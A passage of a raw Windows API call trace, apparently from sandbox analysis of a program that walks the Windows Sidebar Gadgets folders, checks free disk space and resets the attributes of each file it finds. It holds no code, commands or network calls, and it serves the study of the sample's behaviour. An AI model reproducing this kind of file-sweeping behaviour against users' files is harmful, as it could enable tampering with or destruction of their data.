ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0132.544] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0132.544] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7c4b8bc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb7c4b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb7c4b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x23e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0132.544] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0132.544] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ad66a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba4ad66a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xba58159c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0132.544] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ad66a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba4ad66a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xba58159c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0132.544] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.544] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.545] CoTaskMemFree (pv=0x4e1c10) [0132.545] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.545] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.html", cAlternateFileName="")) returned 1 [0132.545] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0132.546] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0132.546] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0132.546] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0132.547] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.559] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html", dwFileAttributes=0x80) returned 0 [0132.561] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.566] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0132.567] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x184e5ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x184e5ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.567] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.html", cAlternateFileName="")) returned 1 [0132.567] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0132.568] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0132.568] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0132.568] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.568] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.568] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.568] CoTaskMemFree (pv=0x4e1c10) [0132.569] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.569] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 1 [0132.569] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.569] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.569] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 1 [0132.570] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 0 [0132.570] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.570] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.570] CoTaskMemFree (pv=0x4e1c10) [0132.571] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.571] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.571] CoTaskMemFree (pv=0x4e1c10) [0132.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.587] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png", dwFileAttributes=0x80) returned 0 [0132.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.598] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png", dwFileAttributes=0x80) returned 0 [0132.599] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.603] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png", dwFileAttributes=0x80) returned 0 [0132.605] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.610] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png", dwFileAttributes=0x80) returned 0 [0132.611] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.629] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png", dwFileAttributes=0x80) returned 0 [0132.630] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.636] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png", dwFileAttributes=0x80) returned 0 [0132.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.643] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png", dwFileAttributes=0x80) returned 0 [0132.644] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.649] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png", dwFileAttributes=0x80) returned 0 [0132.650] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.654] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png", dwFileAttributes=0x80) returned 0 [0132.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.659] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png", dwFileAttributes=0x80) returned 0 [0132.661] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.661] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.661] CoTaskMemFree (pv=0x4e1c10) [0132.661] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.689] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0132.690] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.696] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0132.697] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.704] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0132.705] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.705] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.705] CoTaskMemFree (pv=0x4e1c10) [0132.706] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.711] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html", dwFileAttributes=0x80) returned 0 [0132.720] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.724] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0132.725] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.725] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.726] CoTaskMemFree (pv=0x4e1c10) [0132.726] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.726] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.726] CoTaskMemFree (pv=0x4e1c10) [0132.736] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.736] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.736] CoTaskMemFree (pv=0x4e1c10) [0132.753] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.760] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png", dwFileAttributes=0x80) returned 0 [0132.761] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.766] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png", dwFileAttributes=0x80) returned 0 [0132.767] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.771] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png", dwFileAttributes=0x80) returned 0 [0132.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.777] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png", dwFileAttributes=0x80) returned 0 [0132.778] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.791] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png", dwFileAttributes=0x80) returned 0 [0132.792] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.804] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png", dwFileAttributes=0x80) returned 0 [0132.805] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.814] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows 